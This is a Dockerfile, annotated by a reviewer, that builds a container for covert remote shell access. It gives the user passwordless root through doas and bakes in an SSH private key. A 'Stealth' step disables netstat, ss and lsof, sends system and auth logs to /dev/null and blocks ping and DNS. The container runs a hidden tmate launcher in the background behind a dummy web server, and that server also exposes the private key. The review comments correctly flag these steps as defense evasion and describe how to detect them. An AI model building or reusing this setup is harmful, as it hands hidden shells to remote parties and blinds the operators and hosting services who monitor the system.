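# Base image.
# NOTE(review): the tag is mutable; pin it by digest
# (ubuntu:22.04@sha256:<digest>) if the build has to be reproducible.
FROM ubuntu:22.04

# Build-time only: silences debconf prompts in the RUN steps of this stage
# without leaving the variable in the environment of the running container.
ARG DEBIAN_FRONTEND=noninteractive

# Locale settings that persist into the running container.
ENV LANG=en_US.UTF-8 \
    LANGUAGE=en_US:en \
    LC_ALL=en_US.UTF-8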
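# Update and install packages
# apt-get is used because its command line is stable for scripts. doas is
# installed in the same transaction as everything else, so the package lists
# are removed once, at the end of the layer, instead of being re-downloaded
# and left behind.
# NOTE(review): the list includes remote-access and network tooling (tmate,
# netcat, iptables, net-tools, openssh-client) and a full build toolchain.
# Everything installed here is available to any process in the container;
# drop what the workload does not need.
RUN apt-get update && apt-get upgrade -y && \
    apt-get install -y \
        build-essential \
        ca-certificates \
        cmake \
        curl \
        doas \
        ffmpeg \
        git \
        gnupg \
        htop \
        iptables \
        iputils-ping \
        locales \
        lsof \
        make \
        nano \
        neofetch \
        net-tools \
        netcat \
        openssh-client \
        procps \
        python3 \
        python3-pip \
        software-properties-common \
        tmate \
        tmux \
        tree \
        unzip \
        vim \
        wget \
        xz-utils \
        zip && \
    locale-gen en_US.UTF-8 && \
    apt-get clean && rm -rf /var/lib/apt/lists/*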
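# Install Node.js 22 and npm
# The setup script is saved to a file before it is run, so a failed download
# stops the build; with `curl | bash` under /bin/sh only the exit status of
# bash is checked.
# NOTE(review): the script is still executed as root without an integrity
# check, and `npm install -g npm` takes whatever npm release is current at
# build time. For a reproducible build, verify the script against a vetted
# checksum and pin npm (npm@<version>).
RUN curl -fsSL https://deb.nodesource.com/setup_22.x -o /tmp/nodesource_setup.sh && \
    bash /tmp/nodesource_setup.sh && \
    rm -f /tmp/nodesource_setup.sh && \
    apt-get install -y nodejs && \
    npm install -g npm && \
    rm -rf /var/lib/apt/lists/*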
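# Install speedtest-cli
# --no-cache-dir keeps pip's download cache out of the image layer.
# NOTE(review): the package is unpinned, so the build installs whatever
# release is current; use speedtest-cli==<vetted-version> once one is chosen.
RUN pip3 install --no-cache-dir speedtest-cli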
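# Create user 'draco' with UID 1000
# The UID is assigned at creation. No password is set: a fixed password baked
# into an image can be read by anyone who can pull the image, and the doas
# rule below does not ask for one.
# NOTE(review): `permit nopass draco` lets draco run any command as root
# without authentication. Running the container as this user is therefore
# root-equivalent and gives no privilege boundary; restrict the rule to the
# specific commands that need root, or remove it.
RUN useradd -m -s /bin/bash -u 1000 draco && \
    echo "permit nopass draco" > /etc/doas.conf && \
    echo "alias sudo='doas'" >> /home/draco/.bashrc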
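# SSH key generation
# The directory is created with mode 0700 and owned by draco from the start.
# NOTE(review): the key pair is generated at build time with an empty
# passphrase, so the private key is stored in an image layer. Every container
# started from this image shares the same key, and anyone who can pull the
# image can read it. Treat this key as public; if it is meant to identify a
# host or user, generate it when the container starts instead.
RUN install -d -m 700 -o draco -g draco /home/draco/.ssh && \
    ssh-keygen -t rsa -f /home/draco/.ssh/id_rsa -N '' && \
    chown -R draco:draco /home/draco/.ssh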
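# Stealth: block network info commands + DNS logs
# NOTE(review): this step is defense evasion, not hardening. It takes away
# local visibility (netstat, ss and lsof are made non-executable), overwrites
# nsswitch.conf and /etc/hosts, and points syslog, auth.log and messages at
# /dev/null so that nothing written to those paths is kept. Whoever hosts or
# scans images should treat an image that carries these changes as suspicious.
# Detection: the mode changes, the rewritten nsswitch.conf and the /var/log
# symlinks are stored in this layer, so they show up in an image diff or a
# file-integrity scan (for example, log paths that resolve to /dev/null).
# The `|| true` guards swallow every failure in the chain, so a successful
# build does not show which of these commands actually took effect.
RUN chmod -x /bin/netstat /usr/bin/ss /usr/bin/lsof || true && \
    chmod -r /proc/net || true && \
    echo 'hosts: files dns' > /etc/nsswitch.conf && \
    echo '127.0.0.1 localhost' > /etc/hosts && \
    ln -sf /dev/null /var/log/syslog && \
    ln -sf /dev/null /var/log/auth.log && \
    ln -sf /dev/null /var/log/messages && \
    iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP && \
    iptables -A OUTPUT -p udp --dport 53 -j DROP || true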
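# Copy stealth tmate launcher
# Ownership is set by COPY itself, so the script is not duplicated in a second
# layer by a later chown.
# NOTE(review): run_tmate.sh is not part of this file and has to be reviewed
# on its own. tmate is a terminal-sharing tool, so a launcher for it means the
# container may hand an interactive shell to a remote party. Presumably
# .tmate_hidden.txt receives the session details; confirm against the script.
COPY --chown=draco:draco run_tmate.sh /home/draco/run_tmate.sh
RUN chmod +x /home/draco/run_tmate.sh && \
    touch /home/draco/.tmate_hidden.txt && \
    chmod 600 /home/draco/.tmate_hidden.txt && \
    chown draco:draco /home/draco/.tmate_hidden.txt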
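# Set working user and directory
# NOTE(review): /etc/doas.conf in this image permits draco to run anything as
# root without a password, so USER draco does not confine the process.
USER draco
WORKDIR /home/draco

# Expose a dummy port (optional)
# EXPOSE only documents the port; it does not publish it.
EXPOSE 7860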
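# Stealth run: launch tmate quietly in background + dummy http
# Exec (JSON) form starts bash directly instead of wrapping it in a second
# /bin/sh -c; the command string itself is unchanged.
# NOTE(review): `python3 -m http.server` serves the current working directory,
# which is /home/draco here. The files this Dockerfile places there, including
# the SSH private key, are readable by anyone who can reach port 7860. Its
# output goes to /dev/null, so no access log of those requests is kept.
# NOTE(review): the web server is a placeholder; the actual workload is the
# backgrounded run_tmate.sh, which nothing supervises.
CMD ["bash", "-c", "./run_tmate.sh & python3 -m http.server 7860 > /dev/null 2>&1"]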